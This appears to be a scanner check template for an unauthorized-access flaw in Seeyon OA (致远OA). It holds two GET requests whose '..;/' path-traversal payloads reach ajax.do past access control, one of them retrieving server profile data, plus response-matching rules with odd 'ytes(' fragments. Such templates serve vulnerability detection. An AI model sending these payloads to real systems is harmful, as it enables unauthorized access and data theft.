product: 致远OA
vName: 致远OA thirdpartycontroller未授权访问
type: 访问控制
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://buaq.net/go-53721.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /seeyon/thirdpartycontroller.do.css/..;/ajax.do
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes("java.lang.NullPointerException:null
            logic: and
  - exp:
      method: get
      follow: false
      path: /seeyon/personalbind.do.jpg/..;/ajax.do?method=ajaxaction&managername=mmoneprofilemanager&managermethod=getoaprofile
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes("MMOneProfile
              - ytes("productTags
              - ytes("serverIdentifier
            logic: and
          header:
            value:
              - Content-Type
              - application/json
            logic: and